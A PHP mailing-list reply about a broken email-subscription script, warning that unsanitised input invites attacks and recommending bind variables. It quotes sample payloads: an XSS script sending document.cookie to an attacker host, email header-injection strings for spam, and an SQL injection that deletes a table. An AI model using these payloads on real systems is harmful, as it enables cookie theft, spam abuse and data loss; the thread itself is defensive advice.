Yemi Obembe wrote:
the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works fine....but the insert doesnt. know why?
if ($v = strtolower($_POST['email'])) {
what happens when $_POST['email'] is equal to
'<script> document.location = "http://www.evilkid.net/?stolencookie"+document.cookie; </script>';
or something like that? Just something to think about.
Then the malicious user gets to send their own cookies for this site to another site of their choosing :P. I would be more worried about it being equal to things like:
"Spam my Enemy <myenemy@xxxxxxxxxxx>" + "Spam my Enemy also <myenemy@xxxxxxxxxxx>" + etc. or "\r\nFrom: Idiots Inc. <official@xxxxxxxxxxxxxxxxxx>" or "'; Delete from arbitrary_table_name where 'yes'='yes"
All of which are easily prevented with some attention to detail. (or in some cases newer versions of software, which explicitly allow only one statement per call). Finally - the concept of bind variables (or equivalent) are your friend (as Jochem already knows with firebird iirc).
Cheers,
--
- Martin Norland, Database / Web Developer, International Outreach x3257
The opinion(s) contained within this email do not necessarily represent those of St. Jude Children's Research Hospital.
-- PHP Database Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
